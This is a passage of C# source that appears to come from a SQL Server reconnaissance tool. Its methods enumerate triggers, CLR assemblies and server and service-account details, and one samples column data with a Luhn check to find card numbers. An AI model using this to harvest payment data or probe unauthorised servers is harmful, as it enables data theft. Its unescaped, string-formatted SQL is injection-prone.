using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
string query1_1 = string.Format(
"SELECT \'{0}\' as [ComputerName],\n" +
"\'{1}\' as [Instance],",
computerName, instance);
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(QUERY1_2);
if (!string.IsNullOrEmpty(triggerNameFilter))
{
sb.Append(triggerNameFilter);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
//table = sql.Query(sb.ToString());
triggers = sql.Query <TriggerDdl>(sb.ToString(), new TriggerDdl());
}
/*
* foreach (DataRow row in table.AsEnumerable())
* {
* try
* {
* TriggerDdl td = new TriggerDdl
* {
* ComputerName = computerName,
* Instance = instance,
* TriggerName = (string)row["TriggerName"],
* TriggerId = (int)row["TriggerId"],
* TriggerType = (string)row["TriggerType"],
* ObjectType = (string)row["ObjectType"],
* ObjectClass = (string)row["ObjectClass"],
* TriggerDefinition = (string)row["TriggerDefinition"],
* create_date = (DateTime)row["create_date"],
* modify_date = (DateTime)row["modify_date"],
* is_ms_shipped = (bool)row["is_ms_shipped"],
* is_disabled = (bool)row["is_disabled"]
* };
#if DEBUG
* Misc.PrintStruct<TriggerDdl>(td);
#endif
* triggers.Add(td);
* return true;
* }
* catch (Exception ex)
* {
* if (ex is ArgumentNullException)
* Console.WriteLine("Empty Response");
* else
* Console.WriteLine(ex.Message);
* return false;
* }
* }
*/
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
string query1_1 = string.Format("USE {0};", database);
string query1_3 = string.Format(
"FROM [{0}].[sys].[triggers] WHERE 1=1",
database);
StringBuilder sb = new StringBuilder();
if (showAll)
{
sb.Append(QUERY2_1);
}
else
{
sb.Append(query1_1);
sb.Append(QUERY1_2);
sb.Append(query1_3);
if (!string.IsNullOrEmpty(assemblyNameFilter))
{
sb.Append(assemblyNameFilter);
}
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
//table = sql.Query(sb.ToString());
files = sql.Query <AssemblyFiles>(sb.ToString(), new AssemblyFiles());
}
/*
* foreach (DataRow row in table.AsEnumerable())
* {
* try
* {
* AssemblyFiles af = new AssemblyFiles
* {
* ComputerName = computerName,
* Instance = instance,
* DatabaseName = database,
* schema_name = (string)row["schema_name"],
* file_id = (int)row["file_id"],
* file_name = (string)row["file_name"],
* clr_name = (string)row["clr_name"],
* assembly_id = (int)row["assembly_id"],
* assembly_name = (string)row["assembly_name"],
* assembly_class = (string)row["assembly_class"],
* assembly_method = (string)row["assembly_method"],
* sp_object_id = (int)row["sp_object_id"],
* sp_name = (string)row["sp_name"],
* sp_type = (string)row["sp_type"],
* permission_set_desc = (string)row["permission_set_desc"],
* create_date = (DateTime)row["create_date"],
* modify_date = (DateTime)row["modify_date"],
* content = (string)row["content"],
* };
#if DEBUG
* Misc.PrintStruct<AssemblyFiles>(af);
#endif
* files.Add(af);
* }
* catch (Exception ex)
* {
* if (ex is ArgumentNullException)
* Console.WriteLine("Empty Response");
* else
* Console.WriteLine(ex.Message);
* return false;
* }
* }
*/
return(true);
}
internal override bool Query()
{
if (!base.Query())
{
return(false);
}
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
foreach (var c in base.columns)
{
string query = string.Format(
"USE {0}; SELECT TOP {1} [{2}] FROM {3} WHERE [{2}] is not null",
c.DatabaseName, sampleSize, c.ColumnName, c.TableName);
#if DEBUG
Console.WriteLine(query);
#endif
DataTable table = sql.Query(query);
try
{
foreach (DataRow row in table.AsEnumerable())
{
if (!string.IsNullOrEmpty(c.ColumnName))
{
if (checkLuhn && row[c.ColumnName] is string)
{
if (!Misc.CheckLuhn((string)row[c.ColumnName]))
{
continue;
}
}
results.Add(new SampleData
{
Instance = instance,
DatabaseName = c.DatabaseName,
TableName = c.TableName,
ColumnName = c.ColumnName,
ColumnData = row[c.ColumnName]
});
}
}
}
catch (Exception ex)
{
if (ex is ArgumentNullException)
{
Console.WriteLine("Empty Response");
}
else
{
Console.WriteLine(ex.Message);
}
}
}
}
return(true);
}
internal override bool Query()
{
bool isSysAdmin = false;
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);
string query = query1_1;
if (isSysAdmin)
{
query += query1_2;
}
query += string.Format("SELECT \'{0}\' as [ComputerName],\n", computerName);;
query += query1_4;
if (isSysAdmin)
{
query += query1_5;
}
query += query1_6;
table = sql.Query(query);
}
foreach (DataRow row in table.AsEnumerable())
{
try
{
details = new Details
{
ComputerName = (string)row["ComputerName"],
Instance = (string)row["Instance"],
DomainName = (string)row["DomainName"],
ServiceProcessID = (int)row["ServiceProcessID"],
ServiceName = (string)row["ServiceName"],
ServiceAccount = (string)row["ServiceAccount"],
AuthenticationMode = (string)row["AuthenticationMode"],
ForcedEncryption = (int)row["ForcedEncryption"],
Clustered = (string)row["Clustered"],
SQLServerVersionNumber = (string)row["SQLServerVersionNumber"],
SQLServerMajorVersion = (string)row["SQLServerMajorVersion"],
SQLServerEdition = (string)row["SQLServerEdition"],
SQLServerServicePack = (string)row["SQLServerServicePack"],
OSArchitecture = (string)row["OSArchitecture"],
OsVersionNumber = (string)row["OsVersionNumber"],
Currentlogin = (string)row["Currentlogin"]
};
if (isSysAdmin)
{
details.OsMachineType = (string)row["OsMachineType"];
details.OSVersionName = (string)row["OSVersionName"];
}
#if DEBUG
Misc.PrintStruct <Details>(details);
#endif
return(true);
}
catch (Exception ex)
{
if (ex is ArgumentNullException)
{
Console.WriteLine("Empty Response");
}
else
{
Console.WriteLine(ex.Message);
}
return(false);
}
}
return(false);
}